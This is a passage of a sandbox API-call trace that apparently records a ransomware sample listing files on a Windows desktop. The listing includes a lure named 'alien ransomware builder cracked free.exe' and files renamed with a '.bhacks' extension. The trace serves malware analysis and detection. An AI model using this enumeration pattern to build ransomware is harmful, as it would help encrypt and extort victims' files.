ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0065.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0065.097] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0065.097] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.097] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.cs", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.097] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9beae0 [0065.097] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.097] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0065.099] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0065.099] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0065.099] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0065.099] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0065.099] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0065.099] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0065.099] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0065.099] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0065.100] FindNextFileW (in: hFindFile=0x9beae0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0065.101] FindClose (in: hFindFile=0x9beae0 | out: hFindFile=0x9beae0) returned 1 [0065.101] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.cs", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.101] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bef00 [0065.101] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.101] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0065.101] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0065.101] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, 